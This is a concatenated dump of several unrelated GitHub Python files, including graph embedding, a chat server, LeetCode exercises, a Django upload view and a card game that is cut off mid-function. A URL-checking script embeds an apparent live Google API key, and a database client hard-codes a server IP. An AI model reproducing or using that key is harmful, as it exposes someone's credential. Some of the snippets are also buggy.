path.append(walk)\n path = list(set(path))\n return path\n \ndef saveData(entity2id, relation2id, triples, dirname):\n if not os.path.isdir(dirname):\n os.mkdir(dirname) \n \n entity2id_file= open(os.path.join(dirname, 'entity2id.txt'),'w')\n relation2id_file = open(os.path.join(dirname, 'relation2id.txt'),'w')\n train_file = open(os.path.join(dirname, 'train2id.txt'),'w')\n\n train_file.write(str(num_triples)+'\\n') \n for source in triples:\n for target in triples[source]: \n hid=source\n tid =target\n for rid in triples[source][target]:\n train_file.write(\"%d %d %d\\n\"%(hid,tid,rid))\n\n entity2id_file.write(str(len(entity2id))+'\\n') \n for e in sorted(entity2id, key=entity2id.__getitem__):\n entity2id_file.write(e+'\\t'+str(entity2id[e])+'\\n') \n\n relation2id_file.write(str(len(relation2id))+'\\n') \n for r in sorted(relation2id, key=relation2id.__getitem__):\n relation2id_file.write(r+'\\t'+str(relation2id[r])+'\\n') \n \n train_file.close()\n entity2id_file.close()\n relation2id_file.close()\n\n\ndef extractFeatureVector(model, drugs, id2entity, output): \n \n header=\"Entity\"\n ns = \"n\"\n\n for i in range(model.wv.vectors.shape[1]):\n header=header+\"\\tfeature\"+str(i)\n \n fw=open(output,'w')\n fw.write(header+\"\\n\")\n\n for id_ in sorted(drugs):\n nid =ns+str(id_)\n if (nid) not in model.wv:\n print (nid)\n continue\n vec = model.wv[nid]\n vec = \"\\t\".join(map(str,vec))\n fw.write( id2entity[id_]+'\\t'+str(vec)+'\\n')\n fw.close()\n\n\ndef trainModel(drugs, id2entity, datafilename, model_output, vector_file, pattern, maxDepth):\n \n if not os.path.isdir(model_output):\n os.mkdir(model_output)\n\n \n output = os.path.join(model_output, pattern)\n if not os.path.isdir(output):\n os.mkdir(output)\n \n sentences = MySentences(datafilename, filename=pattern) # a memory-friendly iterator\n model1 = gensim.models.Word2Vec(size=200, min_count=1, workers=8, window=5, sg=1, negative=15, iter=5)\n model1.build_vocab(sentences)\n\n model1.train(sentences, total_examples=model1.corpus_count, epochs =5)\n modelname = 'Entity2Vec_sg_200_5_5_15_2_500'+'_d'+str(maxDepth)\n model1.save(os.path.join(output,modelname))\n \n extractFeatureVector(model1, drugs, id2entity, vector_file)\n del model1\n\n\nclass MySentences(object):\n def __init__(self, dirname, filename):\n self.dirname = dirname\n self.filename = filename\n\n def __iter__(self):\n print ('Processing ',self.filename)\n for subfname in os.listdir(self.dirname):\n if not self.filename in subfname: continue\n fpath = os.path.join(self.dirname, subfname)\n for fname in os.listdir(fpath):\n if not 'part' in fname: continue\n if '.crc' in fname: continue\n try:\n for line in open(os.path.join(fpath, fname), mode='r'):\n line = line.rstrip('\\n')\n words = line.split(\"->\")\n yield words\n except Exception:\n print(\"Failed reading file:\")\n print(fname)\n\n\n\nif __name__==\"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-tr',required=True, dest='rdf_file', help='enter folder path for rdf file')\n parser.add_argument('-w',required=True, dest='walk_folder', help='enter folder path for walks (seqence) to be stored')\n parser.add_argument('-kg',required=True, dest='kg_folder', help='enter folder path for knowledge graphs (as encoded n{#} for entities and e{#} for relation n) to be saved in relation2id and entity2id ')\n parser.add_argument('-m',required=True, dest='model_folder', help='enter folder path for model file to be stored')\n parser.add_argument('-v',required=True, dest='vector_file', help='enter path for model file to be saved')\n\n args = parser.parse_args()\n\n rdf_file= args.rdf_file\n walk_folder = args.walk_folder\n graph_folder = args.kg_folder\n model_folder = args.model_folder\n vector_file = args.vector_file\n\n\n\n findspark.init()\n if False: \n sc.stop()\n\n config = SparkConf()\n config.setMaster(\"local[10]\")\n config.set(\"spark.executor.memory\", \"70g\")\n config.set('spark.driver.memory', '90g')\n config.set(\"spark.memory.offHeap.enabled\",True)\n config.set(\"spark.memory.offHeap.size\",\"50g\") \n sc = SparkContext(conf=config)\n print (sc)\n\n\n #fileext = '.nq.gz'\n entity2id, relation2id, triples = preprocess(rdf_file)\n\n num_triples=0\n for source in triples:\n for target in triples[source]:\n num_triples+=len(triples[source][target])\n print ('Number of triples',num_triples)\n\n\n\n entities = list(entity2id.values())\n b_triples = sc.broadcast(triples)\n\n\n #folder = './walks/'\n folder = walk_folder\n if os.path.isdir(folder):\n shutil.rmtree(folder) \n os.mkdir(folder)\n \n walks = 250\n maxDepth = 5\n for path_depth in range(1,maxDepth):\n filename = os.path.join(folder,'randwalks_n%d_depth%d_pagerank_uniform.txt'%(walks, path_depth))\n print (filename)\n start_time =time.time()\n rdd = sc.parallelize(entities).flatMap(lambda n: randomNWalkUniform(b_triples.value, n, walks, path_depth))\n rdd.saveAsTextFile(filename)\n elapsed_time = time.time() - start_time\n print ('Time elapsed to generate features:',time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n\n #dirname = './graph'\n os.mkdir(graph_folder)\n saveData(entity2id, relation2id, triples, graph_folder)\n\n print (len(entities))\n\n\n id2entity = { value:key for key,value in entity2id.items()} \n\n #datafilename = './walks/'\n #model_output = './models/' \n os.mkdir(model_folder)\n\n pattern = 'uniform'\n #vector_output = './vectors/'\n trainModel(entities, id2entity, walk_folder, model_folder, vector_file, pattern, maxDepth)\n","repo_name":"MaastrichtU-IDS/FaVLib","sub_path":"src/RDF2Vec.py","file_name":"RDF2Vec.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"18957993777","text":"# coding: utf-8\nfrom pymongo import MongoClient\n\n\nclass MongodbClient:\n\n @property\n def mongodb_client(self):\n client = MongoClient(host='47.92.27.75', port=27017)\n db = client['on_app_location']\n db['test'].ensure_index([('location', '2dsphere')])\n return db['test']\n\n def insert(self, data):\n try:\n res = self.mongodb_client.insert(data)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def update(self, old_data, new_data):\n try:\n res = self.mongodb_client.update(old_data, new_data)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def find_all(self, condition=None, max_length=100):\n try:\n res = self.mongodb_client.find(condition).limit(max_length)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def delete(self, data):\n try:\n res = self.mongodb_client.remove(data)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def aggregate(self, condition=None):\n try:\n res = self.mongodb_client.aggregate(condition)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n\nmongodb_cli = MongodbClient()\n","repo_name":"bobowang2017/python_study","sub_path":"mongodb/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44442999904","text":"import socket\nfrom typing import Tuple\n\n\nclass Server:\n _sock = _addr = _port = None\n def __init__(self, addr: str, port: int) -> None:\n self.sock = (addr, port)\n self.addr = addr\n self.port = port\n\n self.clients = []\n self.buffer = []\n \n while True:\n try:\n self.sock.listen(1)\n conn, addr = self.sock.accept()\n conn.settimeout(1)\n print(\"Connected by:\", addr)\n self.clients.append([conn, addr])\n except TimeoutError:\n pass\n\n self.recv_msg()\n \n\n @property\n def sock(self) -> socket.socket:\n return self._sock\n\n @sock.setter\n def sock(self, value: Tuple[str, int]) -> None:\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._sock.settimeout(1)\n self._sock.bind(value)\n print(f\"[+] Listening on {value[0]}:{value[1]}\")\n\n @property\n def addr(self) -> str:\n return self._addr\n\n @addr.setter\n def addr(self, value: str) -> None:\n self._addr = value\n\n @property\n def port(self) -> int:\n return self._port\n\n @port.setter\n def port(self, value: int) -> None:\n self._port = value\n\n def recv_msg(self) -> str:\n for conn, addr in self.clients:\n try:\n data = conn.recv(1024)\n if not data: continue\n print(f\"Got {data.decode()} from {addr}\")\n self.buffer.append([addr, data.decode()])\n self.redistribute()\n except TimeoutError:\n continue\n\n def redistribute(self) -> bool:\n to_remove = []\n for i, [conn, addr] in enumerate(self.clients):\n try:\n conn.sendall(self.buffer[-1][1].encode())\n except: # Client disconnected\n print(f\"[!] {addr} disconnected\")\n to_remove.append(i)\n if to_remove:\n for i, indx in enumerate(to_remove):\n self.clients.pop(indx - i)\n\n\nif __name__ == \"__main__\":\n server = Server(\"192.168.77.119\", 50508)\n","repo_name":"MattTheCoder-W/chat-rooms","sub_path":"src/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35764083440","text":"import errno\nimport socket\nimport sys\n\n\ndef patch_redis_empty_recv():\n \"\"\"On Windows, socket disconnect result in errors rather than empty reads.\n redis-py does not handle these errors correctly.\n This patch translates connection resets to empty reads as in POSIX.\n \"\"\"\n assert sys.platform == \"win32\"\n import redis\n\n def redis_recv(sock, *args, **kwargs):\n result = b\"\"\n try:\n result = redis._compat.recv(sock, *args, **kwargs)\n except socket.error as ex:\n if ex.errno not in [errno.ECONNRESET, errno.ECONNREFUSED]:\n raise\n return result\n\n redis.connection.recv = redis_recv\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"3888355535","text":"'''\nTWO SUM\n-------\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nRESTATE\nIn a list, find the two numbers that add up to the nunmber you're looking for. You may not use the same number twice, and there is only 1 pair of numbers that add up to the correct number.\n\nCLARIFYING\nIs it sorted? How long is the input list?\n\nASSUMPTIONS\nI'll assume not sorted and the length of the list tends to be within double digits\n\nBRAINSTORM\nMy initial, bruteforce, idea would be to check each number against each other and find the ones that add up.\n\nEXPLAIN\nHere we have a 0(n^2) solution in which we check each element against themselves.\nBecause they have to be two seperate elements we skip looking at the same element.\nThen we simply check if it sums properly.\n\nTRADEOFFS\nOverall it's less time efficient but is more memory efficient.\n'''\n\ndef two_sum(list, target):\n list = enumerate(list)\n for index, ele in list:\n for other_index, other_ele in list:\n if index == other_index:\n continue\n if ele + other_ele == target:\n return (ele, other_ele)\n\n'''\nADD TWO NUMBERS\n-------\nYou are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.\n\nYou may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\nRESTATE\nEssentially we have two reverse order numbers that need to be queued up and converted into an integer. And from the sums convert it back into a reverse order linked list and return it\n\nCLARIFYING\nIs the linked list singly linked? Can I use built in Queue structure?\n\nASSUMPTIONS\nI'll assume I can use built in queue structure and the linked list is singly linked.\n\nBRAINSTORM\nI have to Queue up both numbers so I'll built an object type that takes in the reversed linked list and works back and forth for converting.\n\nEXPLAIN\nSo I've built an object which accepts the list or the number and converts it depending on which one you pass it.\nIt utilizes the queue stucture to reverse it and built it into a linked list, or to reverse the linked list and build it into a number.\n\nTRADEOFFS\nSo far it's linear time complexity. I think the algorithms are generally efficient. I've built an object to handle the conversions cleanly.\nWhile you can do it without it, it's more maintanable and readable this way.\n'''\nimport queue\n\n# included in starter code\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass ReverseNumber():\n def __init__(self, **kwargs):\n self.list = None\n self.number = None\n\n if \"list\" in kwargs:\n self.reverse_list = kwargs[\"list\"]\n if \"number\" in kwargs:\n self.numbers = kwargs[\"number\"]\n self.get_reverse()\n \n def get_reverse(self):\n num = str(self.number)\n num_q = queue.Queue()\n for digit in num:\n num_q.put(digit)\n\n head = ListNode(None)\n last_node = head\n for digit in range(num_q):\n node = ListNode(num_q.get())\n last_node.next = node\n \n self.list = head.next\n \n def get_num(self):\n num_q = queue.Queue()\n this_node = self.list\n while this_node:\n num_q.put(this_node.val)\n this_node = this_node.next\n \n final_num = \"\"\n for digit in range(num_q):\n final_num = final_num + num_q.get()\n \n self.number = int(final_num)\n\ndef solution(l1, l2):\n l1 = ReverseNumber(list = l1)\n l2 = ReverseNumber(list = l2)\n sum = l1.number + l2.number\n sum = ReverseNumber(number = sum)\n return sum.list","repo_name":"type9/spd1.4-problems","sub_path":"leetcodeproblems.py","file_name":"leetcodeproblems.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26035157907","text":"# coding=utf-8\nfrom django.utils.http import is_safe_url\nimport pandas as pd \nimport requests\nimport urllib3\n\n# def check_safety(filename):\n# \tdata = pd.read_csv(filename)\n# \tsafe_url = []\n\n# \tfor url in data['news_url']:\n# \t\ttempUrl = str(url)\n# \t\tif not tempUrl == 'nan':\n# \t\t\tif is_safe_url(tempUrl, allowed_hosts='www.youtube.com'):\n# \t\t\t\t#print('This url is safe')\n# \t\t\t\tsafe_url.append(tempUrl)\n# \t\t\telse:\n# \t\t\t\tprint('This url is risky: ', tempUrl)\n\n\n# \tname = ['news_url']\n# \tsafe_csv = pd.DataFrame(columns=name, data=safe_url)\n# \tsafe_csv.to_csv('../safe_url1.csv', encoding='utf-8')\n\nkey = 'AIzaSyBZZ7tN83YYztM8KH9t6CH1YRQVcnnX6Ec'\nURL = \"https://sb-ssl.google.com/safebrowsing/api/lookup?client=api&apikey={key}&appver=1.0&pver=3.0&url={url}\"\nurllib3.disable_warnings()\n\ndef check_safety(filename):\n\tdata = pd.read_csv(filename)\n\tsafe_url = []\n\tmalware = 0\n\tindex = 0\n\n\tfor url in data['news_url'][16000::]:\n\t\ttempUrl = str(url)\n\t\tif not tempUrl == 'nan':\n\t\t\tresp = requests.get(URL.format(key=key, url=tempUrl), verify=False)\n\n\t\t\tif resp.text != 'malware':\n\t\t\t\tprint('Safe ', index)\n\t\t\t\tsafe_url.append(tempUrl)\n\t\t\telse:\n\t\t\t\tprint('This url is harmful: ', tempUrl)\n\t\t\t\tmalware += 0\n\t\tindex += 1\n\n\n\tprint('Harmful url number: ', malware)\n\tname = ['news_url']\n\tsafe_csv = pd.DataFrame(columns=name, data=safe_url)\n\tsafe_csv.to_csv('../safe_url1.csv', encoding='utf-8')\n\t#for url in data['news_url']:\n\t\t\n\n\n\n","repo_name":"myr-ryan/metamorphic_testing_fake_news","sub_path":"script/is_safe_url.py","file_name":"is_safe_url.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72750221226","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom .models import UploadFile\nfrom .forms import UploadForm\nfrom .tasks import timestamp, gzip_compress\n\ndef list(request):\n # Handle file upload\n if request.method == 'POST':\n form = UploadForm(request.POST, request.FILES)\n if form.is_valid():\n newfile = UploadFile(uploadfile = request.FILES['uploadfile'])\n newfile.save()\n timestamp.delay()\n gzip_compress.delay(file_in = newfile)\n # Redirect to the uploaded files list after POST\n return HttpResponseRedirect(reverse('file_process.views.list'))\n else:\n form = UploadForm() # A empty, unbound form\n\n # Load documents for the list page\n uploadfiles = UploadFile.objects.all()\n\n # Render list page with the documents and the form\n return render_to_response(\n 'file_process/list.html',\n {'uploadfiles': uploadfiles, 'form': form},\n context_instance=RequestContext(request)\n )\n","repo_name":"madprime/django_celery_fileprocess_example","sub_path":"file_process/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37424034179","text":"import os\nimport json\nfrom . import BaseAction\nfrom ....db.hubdata.localslugs import SlugDb\nfrom ...content.card import ModelCard\nfrom ....default import CARD_FILE\n\n\nclass CardGetter(BaseAction):\n def __init__(self, model_id, config_json):\n BaseAction.__init__(\n self, model_id=model_id, config_json=config_json, credentials_json=None\n )\n self.mc = ModelCard(config_json=config_json)\n self.slugdb = SlugDb(config_json=config_json)\n\n def get(self):\n self.logger.debug(\"Getting model card of {0}\".format(self.model_id))\n card = self.mc.get(self.model_id, as_json=False)\n slug = card[\"Slug\"]\n model_path = self._model_path(self.model_id)\n card_path = os.path.join(model_path, CARD_FILE)\n with open(card_path, \"w\") as f:\n json.dump(card, f, indent=4)\n self.logger.debug(\"Card saved at {0}\".format(card_path))\n self.logger.debug(\"Saving slug {0}\".format(slug))\n self.slugdb.insert(self.model_id, slug)\n","repo_name":"ersilia-os/ersilia","sub_path":"ersilia/hub/fetch/actions/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"18499730848","text":"from fastapi import FastAPI\nfrom database import database, updates\nfrom models.update import UserUpdate, UserUpdateIn\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n@app.post(\"/update\", response_model=UserUpdate)\nasync def create_update(update: UserUpdateIn):\n query = updates.insert().values(name=update.name, body=update.body)\n last_record_id = await database.execute(query)\n return {**update.dict(), \"id\": last_record_id}\n\n\n@app.get(\"/updates\", response_model=list[UserUpdate])\nasync def get_all_updates():\n query = updates.select()\n return await database.fetch_all(query)\n","repo_name":"tecladocode/fastapi-course","sub_path":"project/01-post-updates/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15186554599","text":"from collections import defaultdict\nimport ui_utils as ui\nfrom enum import Enum\nfrom dataclasses import dataclass\nfrom typing import List\nimport random\nimport operator\n\nclass Rank(Enum):\n ACE = 1\n TWO = 2\n THREE = 3\n FOUR = 4\n FIVE = 5\n SIX = 6\n SEVEN = 7 \n EIGHT = 8\n NINE = 9\n TEN = 10\n JACK = 11\n QUEEN = 12\n KING = 13\n\n def format(self):\n traductions = [str(i+1) for i in range(10)] + ['J', 'Q', 'K']\n return traductions[self.value-1]\n\nclass Suit(Enum):\n CLUB = 1\n DIAMOND = 2\n HEART = 3\n SPADE = 4\n\nclass Colors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nclass Card:\n def __init__(self, rank: Rank, suit: Suit):\n self.rank = rank\n self.suit = suit\n self.format = '{}'.format(self.rank.format())\n self._is_discovered = False\n\n def discover(self, yes: bool):\n self._is_discovered = yes\n\n def is_discovered(self):\n return self._is_discovered\n\n def __repr__(self):\n return '{}'.format(self.format)\n\n def __eq__(self, obj):\n return isinstance(obj, Card) and self.format == obj.format\n\n def __hash__(self):\n return hash((self.rank, self.suit))\n\nclass CommandKeys(Enum):\n QuitKey = 'Q'\n KoboKey = 'K'\n\nclass PlayerInput:\n def __init__(self):\n self.is_index = False\n self.is_command = False\n self.is_kobo = False\n self.is_quit_key = False\n self.value = ''\n\n def input_loop(self, nb_cards, msg='', accept_indexes=False, accept_commands=False) -> int:\n \"\"\" loop asking the user to enter an answer.\n \"\"\"\n self.value = self._input(msg)\n \n while (accept_indexes and accept_commands and not self._is_correct(nb_cards)) \\\n or (accept_indexes and not accept_commands and not self._check_card_index(nb_cards)) \\\n or (accept_commands and not accept_indexes and not self._check_command()):\n print(self._invalid_input_msg(nb_cards))\n self.value = self._input(msg)\n if self._check_kobo():\n self.is_kobo = True\n if self._check_card_index(nb_cards):\n self.value = int(self.value) - 1\n self.is_index = True\n elif self._check_command():\n self.is_command = True\n if self.is_command and self.value == CommandKeys.QuitKey.value:\n self.is_quit_key = True\n\n def _input(self, msg: str='') -> str:\n return input(msg)\n\n def _is_correct(self, nb_cards: int) -> bool:\n \"\"\" returns wether the user's input is correct. \n In bound of the number of cards or a command.\n \"\"\"\n return self._check_card_index(nb_cards) or self._check_command()\n\n def _check_card_index(self, nb_cards: int) -> bool:\n inp = self.value.split()\n if not 1 >= len(inp) <= 2:\n return False\n inp = inp[0]\n if not inp.isdigit():\n return False\n inp = int(inp)\n return 1 <= inp <= nb_cards\n\n def _check_command(self) -> bool:\n inp = self.value.split()\n if not 1 >= len(inp) <= 2:\n return False\n cmd = inp[0]\n return self._is_valid_command(cmd)\n\n def _check_kobo(self) -> bool:\n inp = self.value.split()\n if len(inp) != 2:\n return False\n cmd = inp[1]\n is_kobo = self._is_valid_command(cmd) and cmd == CommandKeys.KoboKey\n if is_kobo:\n self.value = cmd[0]\n return is_kobo\n\n def _is_valid_command(self, cmd: str):\n return isinstance(cmd, str) and cmd in set(item.value for item in CommandKeys)\n\n def _invalid_input_msg(self, nb_cards: int):\n digit_valid = [*range(1, nb_cards + 1)]\n return 'Invalid command, valid commands: {}'.format( \\\n [*digit_valid, *list(map(lambda x: x.value, [*CommandKeys]))])\n\nclass Game:\n def __init__(self, nb_cards=4):\n self.nb_cards = nb_cards\n self._init_players()\n self._init_game()\n self._displayed_cards = [0, 1]\n self._should_display_cards = True\n\n def pop_card(self):\n if len(self.deck) == 0:\n print('The deck is empty!')\n exit()\n return self.deck.pop()\n\n def launch(self):\n player, ai = self.player, self.ai_player\n player_turn = bool(random.randint(0, 1))\n thrown_cards: List[Card]\n\n while True:\n deck_card = self.pop_card()\n if player_turn:\n # if self._should_display_cards:\n # player.display_cards(visible_cards=self._displayed_cards)\n # player._display_deck_card(deck_card)\n thrown_cards = player.play(deck_card)\n self._displayed_cards = []\n else:\n ai.display_cards()\n ai._display_deck_card(deck_card)\n thrown_cards = ai.play(deck_card)\n self._throw_duplicate_cards(thrown_cards, player_turn)\n self.thrown_deck += thrown_cards\n print(('PLAYER' if player_turn else 'AI') + ' PLAYS')\n visible_cards = [c for c in ai.cards if c.is_discovered()]\n if not player_turn:\n print(f'Visible cards: {visible_cards}')\n print(f'Cards: {ai.cards}')\n print(f'Kobo: {ai.is_kobo}')\n\n player_turn = not player_turn\n if self._check_victory(player, ai):\n break\n\n def _init_players(self):\n self.ai_player = AIPlayer(self)\n self.player = Player(self)\n\n def _init_game(self):\n self.thrown_deck = []\n deck = []\n for suit in Suit:\n for rank in Rank:\n card = Card(rank, suit)\n deck.append(card)\n random.shuffle(deck)\n self.deck = deck\n\n cards = []\n nb_players = 2\n for _ in range(nb_players):\n tmp = []\n for _ in range(self.nb_cards):\n tmp.append(self.pop_card())\n cards.append(tmp.copy())\n self.ai_player.set_cards(cards[0])\n # self.ai_player.set_cards([Card(Rank.ACE, Suit.CLUB), Card(Rank.NINE, Suit.CLUB), Card(Rank.FOUR, Suit.CLUB), Card(Rank.NINE, Suit.CLUB)])\n self.player.set_cards(cards[1])\n\n def _check_victory(self, player, ai_player):\n if len(player.cards) == 0:\n player.win()\n print('YOU WON')\n return True\n elif len(ai_player.cards) == 0:\n ai_player.win()\n print('THE AI WON')\n return True\n return False\n\n def set_displayed_cards(self, cards: [int]):\n self._displayed_cards = cards\n\n def set_should_display_cards(self, should: bool):\n self._should_display_cards = should\n \n def nb_occurences_in_deck(self, rank: Rank):\n return len([c for c in self.deck if c.rank == rank])\n\n def _throw_duplicate_cards(self, thrown_cards: List[Card], player_turn: bool):\n thrown_ranks = list(map(lambda x: x.rank, thrown_cards))\n other_player = self.player if not player_turn else self.ai_player\n for c in other_player.cards:\n if c.rank in thrown_ranks:\n print(f'{c} is a duplicate card!')\n other_player.cards.remove(c)\n # IMPORTANT !!! handle the effects of cards (queen or J if duplicate) use inheritance for methods\n\n\nclass PlayerI:\n def __init__(self, game):\n self.game = game\n self.victories = 0\n self.is_kobo = False\n\n def set_cards(self, cards):\n self.cards = cards\n for c in self.cards[:2]:\n c.discover(True)\n\n @property\n def nb_cards(self):\n return len(self.cards)\n\n @property\n def _hidden_cards(self):\n return [i for i in range(self.nb_cards) if not self.cards[i].is_discovered()]\n\n def win(self):\n self.victories += 1\n\n def play(self, deck_card):\n pass\n\n def _apply_card_effects(self, thrown_cards):\n pass\n\n def _substitute_card(self, index: int, deck_card: Card):\n selected = self.cards[index]\n deck_card.discover(True)\n thrown_cards = [self.cards.pop(index)]\n self.cards.insert(index, deck_card)\n\n # remove all duplicates of the chosen card\n updated_cards = self.cards.copy()\n for i in range(len(self.cards)):\n c = self.cards[i]\n if c.is_discovered() and c == selected:\n thrown_cards.append(updated_cards.pop(i))\n self.cards = updated_cards\n return thrown_cards\n\n def _do_not_substitute_card(self, deck_card: Card):\n thrown_cards = []\n updated_cards = self.cards.copy()\n for i in range(len(self.cards)):\n c = self.cards[i]\n if c.is_discovered() and c == deck_card:\n thrown_cards.append(updated_cards.pop(i))\n self.cards = updated_cards\n return thrown_cards\n\n def display_cards(self, visible_cards: List[int]=[]):\n cards = ' '.join([self.cards[i].format if i in visible_cards else self.cards[i].format for i in range(len(self.cards))])\n styled = ui.wrap_str_in_stars(cards)\n print(styled)\n # print(' '.join([c.format for c in self.cards]))\n\n def _display_deck_card(self, card: Card):\n print('New card')\n styled = ui.wrap_str_in_stars(card.format)\n print(styled + Colors.ENDC)\n\n def _trigger_queen_effect(self, card_index: int):\n self.cards[card_index].discover(True)\n\n def _trigger_jack_effect(\n self, \n my_card_index: int, \n other_card_index: int,\n other_cards: List[Card]\n ):\n self.cards[my_card_index].discover(False)\n other_cards[other_card_index].discover(False)\n self.cards[my_card_index], other_cards[other_card_index] = \\\n other_cards[other_card_index], self.cards[my_card_index]\n\n\nclass Player(PlayerI):\n def __init__(self, game):\n super().__init__(game)\n\n def play(self, deck_card):\n inp = PlayerInput()\n inp.input_loop(self.nb_cards, msg='Your turn: ', accept_indexes=True, accept_commands=True)\n self.is_kobo = inp.is_kobo\n return self._handle_input(inp, deck_card)\n\n def _handle_input(self, inp: PlayerInput, deck_card: Card):\n if inp.is_index:\n thrown_cards = self._substitute_card(inp.value, deck_card)\n self._apply_card_effects(thrown_cards)\n return thrown_cards\n elif inp.is_command:\n if inp.is_quit_key:\n thrown_cards = self._do_not_substitute_card(deck_card)\n self._apply_card_effects(thrown_cards)\n return thrown_cards\n\n def _apply_card_effects(self, thrown_cards):\n self.game.set_should_display_cards(True)\n for card in thrown_cards:\n if card.rank == Rank.JACK:\n self.display_cards()\n inp = PlayerInput()\n inp.input_loop(self.nb_cards, msg='Which card do you wanna switch? ', accept_indexes=True, accept_commands=True)\n if inp.is_quit_key:\n break\n my_card = inp.value\n self.game.ai_player.display_cards()\n inp = PlayerInput()\n inp.input_loop(self.game.ai_player.nb_cards, msg='Which card do you wanna peek? ', accept_indexes=True)\n other_card = inp.value\n super()._trigger_jack_effect(my_card, other_card, self.game.ai_player.cards)\n\n if card.rank == Rank.QUEEN:\n inp = PlayerInput()\n inp.input_loop(self.game.ai_player.nb_cards, msg='Which card do you wanna see? ', accept_indexes=True, accept_commands=True)\n if inp.is_quit_key:\n break\n hidden_card_index = inp.value\n super()._trigger_queen_effect(hidden_card_index)\n self.display_cards(visible_cards=[hidden_card_index])\n self.game.set_should_display_cards(False)\n\n def display_cards(self, visible_cards: List[int]=[]):\n print(Colors.BOLD)\n print('Your cards')\n super().display_cards(visible_cards=visible_cards)\n\n def _display_deck_card(self, card: Card):\n print(Colors.OKCYAN)\n super()._display_deck_card(card)\n\nclass AIPlayer(PlayerI):\n def __init__(self, game):\n super().__init__(game)\n\n def play(self, deck_card):\n def get_best_hit_index(cards: List[Card], rank_to_ignore: Rank=None) -> int:\n \"\"\" returns the index of the card with the worst value.\n Does not take into account the duplicates.\n \"\"\"\n worst, worst_idx = cards[0].rank.value, 0\n for i in range(1, len(cards)):\n c = cards[i]\n # if we have a queen and we also have 1 or more hidden cards\n if c.rank == Rank.QUEEN and len(self._hidden_cards) >= 1:\n return i\n occurences = self.game.nb_occurences_in_deck(c.rank)\n # if only 1 or 2 card are remaining in the deck\n if occurences in [1, 2] and not is_a_great_card(c):\n return i\n # get rank with highest value\n if c.rank.value > worst and c.rank != rank_to_ignore:\n worst, worst_idx = c.rank.value, i\n return worst_idx\n\n def get_worst_combinaison_of_cards_index(cards: List[Card]) -> int:\n \"\"\" returns the index of the card which when played\n will lose the most points. Takes into account the duplicate\n cards which will lose more points.\n \"\"\"\n card_values = defaultdict(int)\n for i in range(len(cards)):\n c = cards[i]\n card_values[c.rank.value] += c.rank.value\n max_combinaison_rank = max(card_values.items(), key=operator.itemgetter(1))[0]\n print(card_values.items())\n print(max_combinaison_rank)\n first_idx = next(i for i in range(len(cards)) if cards[i].rank.value == max_combinaison_rank)\n return first_idx\n\n def get_first_card_index(cards: List[Card], rank: Rank) -> int:\n for i in range(len(cards)):\n if cards[i].rank == rank:\n return i\n return -1\n\n def get_random_card_index(\n cards: List[Card], \n do_not_choose_indexes: List[int]=[]\n ) -> int:\n \"\"\" returns a pseudo random index from list of cards;\n some `do_not_choose_indexes` can be provide to avoid \n to peek same card multiple times.\n \"\"\"\n if len(cards) == 0:\n return 0\n for i in range(len(cards)):\n if i not in do_not_choose_indexes:\n return i\n return random.randint(0, len(cards))\n\n def get_hidden_card_index(cards: List[Card]) -> int:\n \"\"\" returns the first index of a hidden card in `cards` or -1.\n \"\"\"\n return next(iter(self._hidden_cards)) if len(self._hidden_cards) > 0 else -1\n\n def apply_card_effects(\n thrown_cards: List[Card], \n cards: List[Card],\n other_player_cards: List[Card],\n deck_card: Card):\n def apply_jack_effect(thrown_cards: List[Card], cards: List[Card], other_player_cards: List[Card]):\n \"\"\" apply effect on all jack cards.\n \"\"\"\n already_peeked_indexes = []\n for c in thrown_cards:\n if c.rank == Rank.JACK and self.game.player.is_kobo: # only use 